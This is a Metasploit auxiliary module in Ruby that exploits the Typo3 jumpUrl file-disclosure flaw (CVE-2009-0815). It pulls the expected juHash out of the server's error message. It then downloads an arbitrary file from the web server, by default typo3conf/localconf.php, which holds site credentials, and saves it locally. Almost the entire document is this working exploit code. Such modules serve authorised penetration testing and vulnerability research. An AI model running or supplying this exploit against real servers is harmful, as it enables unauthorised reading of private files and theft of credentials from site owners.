##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
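class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  # Error text an unpatched jumpUrl handler returns when the submitted juHash
  # is wrong; capture group 1 holds the value the server itself computed.
  JUHASH_ERROR_RE = /jumpurl Secure: Calculated juHash, (\w+), did not match the submitted juHash./

  # Timeout, in seconds, handed to send_request_raw for each request.
  REQUEST_TIMEOUT = 25

  # Registers module metadata, references and the URI / RFILE / LFILE options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Typo3 sa-2009-002 File Disclosure',
      'Description'    => %q{
        This module exploits a file disclosure vulnerability in the jumpUrl mechanism of
        Typo3. This flaw can be used to read any file that the web server user account has
        access to.
      },
      'Author'         => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          ['OSVDB', '52048'],
          ['CVE', '2009-0815'],
          ['URL', 'http://secunia.com/advisories/33829/'],
          ['URL', 'http://www.exploit-db.com/exploits/8038/'],
          ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
        ],
      'DisclosureDate' => 'Feb 10 2009',
      'Actions'        =>
        [
          ['Download']
        ],
      'DefaultAction'  => 'Download'
    ))

    register_options(
      [
        OptString.new('URI',   [true, "Typo3 Path", "/"]),
        OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
        OptString.new('LFILE', [true, "The local filename to store the data", "localconf.php"]),
      ], self.class)
  end

  # Entry point: obtains the juHash from the server's error message, requests
  # RFILE with it, and writes the response body to LFILE.
  #
  # Returns nil early (after print_error) when the server does not answer,
  # the juHash cannot be recovered, or the remote file does not exist.
  def run
    print_status("Establishing a connection to the target...")

    ju_hash = fetch_ju_hash
    return unless ju_hash

    print_status("Trying to get #{datastore['RFILE']}.")
    res = jumpurl_request(ju_hash)

    # The original compared with `=` (assignment), so a non-OK reply was never
    # detected; the status check is now a real comparison.
    unless res && res.message == "OK"
      print_error("Error while getting file.")
      return
    end

    if res.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
      print_error("File #{datastore['RFILE']} does not exist.")
      return
    end

    print_status("Writing local file #{datastore['LFILE']}.")
    # File.open, not Kernel#open: Kernel#open interprets a leading '|' in the
    # path as a command to spawn. Binary mode keeps the body byte-exact.
    File.open(datastore['LFILE'], 'wb') { |f| f.write(res.body) }
  end

  private

  # Requests RFILE without a juHash so the server's error message discloses
  # the value it expected.
  #
  # @return [String, nil] the juHash, or nil after printing the reason
  def fetch_ju_hash
    res = jumpurl_request

    unless res && res.message == "OK"
      print_error("No response from the server.")
      return nil
    end

    # Regexp#match handles a nil body (returns nil) as well as no match.
    match = JUHASH_ERROR_RE.match(res.body)
    if match.nil?
      print_error("Error while getting juHash. Maybe the version is already patched...")
      return nil
    end

    ju_hash = match[1]
    print_status("Getting juHash from error message: #{ju_hash}")
    ju_hash
  end

  # Sends one GET to index.php's jumpUrl handler for RFILE.
  #
  # @param juhash [String, nil] value for the juHash parameter; omitted when nil,
  #   which produces the same query string as the original first request
  # @return [Rex::Proto::Http::Response, nil] whatever send_request_raw returns
  def jumpurl_request(juhash = nil)
    params = ['jumpurl=' + datastore['RFILE'], 'juSecure=1', 'type=0']
    params << "juHash=#{juhash}" if juhash
    params << 'locationData=1:'

    send_request_raw({
      'uri'     => datastore['URI'] + '/index.php?' + params.join('&'),
      'method'  => 'GET',
      'headers' =>
        {
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
          'Connection' => 'Close',
        }
    }, REQUEST_TIMEOUT)
  end
end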